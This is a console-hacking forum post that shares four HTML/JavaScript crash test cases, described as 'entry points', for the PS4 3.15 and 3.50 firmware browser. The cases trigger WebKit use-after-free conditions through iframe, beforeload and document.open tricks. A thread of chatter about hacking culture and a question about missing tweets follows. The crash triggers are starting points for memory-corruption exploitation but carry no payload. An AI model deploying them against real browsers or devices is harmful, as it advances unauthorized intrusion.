PS4 3.15 Firmware Entry Point for Testing from Zecoxao

Following the recent PS4 Dlclose Exploit for 1.76 Firmware, today I'd like to share a talk between zecoxao and Zer0xFF on finding an entry point for testing with PS4 Firmware 3.15 and also 3.50.

• http://2.83.228.148/totally_not_gachimuchi/

@zecoxao seems to be working on an entry point for the PS4 3.15 FW and wants some testers
1. Entry point:

<iframe></iframe><object onbeforeload="crash()">
    <script>
    if (window.testRunner) {
        testRunner.dumpAsText();
        testRunner.waitUntilDone();
    }

    function crash() {
        document.getElementsByTagName("iframe")[0].contentWindow.scrollX;
        document.open();
    }

    document.body.offsetLeft;
    setTimeout(function() {
        document.close();
        document.body.innerHTML = 'PASS if not crashed.';
        testRunner.notifyDone();
    }, 1);
    </script>

2. Entry point:

<input id="t1" type="time">
    <script>
    var time1 = document.getElementById('t1');
    document.addEventListener('beforeload', function(event) {
        time1.value = time1.value ? '' : '23:59';
    }, true);

    if (window.testRunner) {
        testRunner.dumpAsText();
        testRunner.waitUntilDone();
    }
    setTimeout(function() {
        document.body.innerHTML = 'PASS if not crashed.';
        testRunner.notifyDone();
    }, 100);
    time1.focus();
    </script>
    <embed src="data:text/html,PASS"></embed>

Also the the source code from the Webkit from Sony

• EDIT / Update by B7U3 C50SS & source files from zecoxao & and a file server for accessing the PS4 Tests page - via, pasha4ur:
• You may also crash test your PS4 browser ATM on any FW from zecoxao's Github Page.

3. Entry Point:

<script>
function inituaf() {
  for(var i=0; i<100; i++) {
    for(var j=0; j<32; j++) {
    }
  }
  try { CollectGarbage(); } catch(err) {
    try { window.gc(); } catch(err) {
      for(var i=0; i<100; i++) {
      }
    }
  }
}

function eventhandler2() {

  try { var00002 = document; } catch(err) { } //line 2
  try { var00003 = var00002; } catch(err) { } //line 3
  try { var00043 = 0; } catch(err) { } //line 45
  try { var00044 = var00003.getElementsByTagName("iframe")[var00043]; } catch(err) { } //line 46
  try { var00045 = var00044.contentWindow; } catch(err) { } //line 47
  try { var00063 = -1; } catch(err) { } //line 67
  try { var00064 = 0; } catch(err) { } //line 68
  try { var00045.scrollTo(var00063,var00064); } catch(err) { } //line 69
  try { var00002.write(); } catch(err) { } //line 185
}


</script>
><object onbeforeload="eventhandler2()"><iframe>

4. Entry Point:

<!DOCTYPE html>
<html>
<body>
<iframe></iframe>
<script>

var _gc;

function run()
{
    var iframe = document.getElementsByTagName('iframe')[0];
    iframe.contentDocument.documentElement.contentEditable = true;

    iframe.contentDocument.documentElement.addEventListener('focusout', function () {
        iframe.parentNode.removeChild(iframe);
    }, false);

    iframe.contentDocument.documentElement.focus();
}
document.addEventListener('DOMContentLoaded', run);
</script>
</body>
</html>

 

[SorenAlke]

This whole thing is evolved around fame and who can release the first hack and claiming to be the best. I've bin here long enough to know as I've bin here since way back and watched as things unravelled thro thick and thin and even be4 that

i want people to program. i hope ppl do so
you showed me the love of code
so thats all i really want to come from this
and maybe just maybe ppl work together for once.

 

[Chaos Kid]

i want people to program. i hope ppl do so

There is so little of that now days I hear so much I'm a programmer n yet see the work show every sign of a hacker. Sure some programming requires hacking but to what end?
This is exactly y companies go after hackers seeking fame except who can hack. Who Dee do I can 2 but not for the same reasons.

I wod like to see ppl develop to actualy develop things not destroy Corp companies

 

[SorenAlke]

There is so little of that now days I hear so much I'm a programmer n yet see the work show every sign of a hacker. Sure some programming requires hacking but to what end?
This is exactly y companies go after hackers seeking fame except who can hack. Who Dee do I can 2 but not for the same reasons.

I wod like to see ppl develop to actualy develop things not destroy Corp companies

same here. programming is something i will love.
i jus wish ppl had the same motivation.
so many ppl not to mention kids growing up can be empowered to be what they want to be

 

[Chaos Kid]

same here. programming is something i will love.
i jus wish ppl had the same motivation.
so many ppl not to mention kids growing up can be empowered to be what they want to be

All kids learn is how to hack and get stuck embraced in the whole ideal of power of hacking which corrupts them. This is y the scene has fallen apart.
To be a developer is one of the greatest things but requires hrs of devotion and research not from devwiki or any site you shod always figure it out on your own first then read abit from various sites and you will see how correct it realy is

 

[SorenAlke]

All kids learn is how to hack and get stuck embraced in the whole ideal of power of hacking which corrupts them. This is y the scene has fallen apart.
To be a developer is one of the greatest things but requires hrs of devotion and research not from devwiki or any site you shod always figure it out on your own first then read abit from various sites and you will see how correct it realy is

agreed to no end.
that is truth

 

[Chaos Kid]

agreed to no end.
that is truth

Most the stuff I do is not anywhere spoken of on the net nor is how it works and only the one is mentioned with no details on how to use it.
Top level gets you only so far and may work but kernel is where you want to be for any developer.

 

[SorenAlke]

Most the stuff I do is not anywhere spoken of on the net nor is how it works and only the one is mentioned with no details on how to use it.
Top level gets you only so far and may work but kernel is where you want to be for any developer.

we've had this discussion . and yes i agree. but its been some ass work not getting exhausted lol

 

[Chaos Kid]

we've had this discussion . and yes i agree. but its been some ass work not getting exhausted lol

Yes it takes alot out of you and takes great understanding how it works and how the system works together with the software and hw usually ppl who have great knowledge of kernels understand this.

 

[B7U3 C50SS]

hmm seems zecoxao's twitter was down for a bit but now it's back online. some of the tweets need a refresh @PSXHAX !! Is there something you can do about this?

 

[PSXHAX]

hmm seems zecoxao's twitter was down for a bit but now it's back online. some of the tweets need a refresh @PSXHAX !! Is there something you can do about this?

Usually Tweets that have been removed from Twitter won't show embedded any longer, perhaps he removed some of them?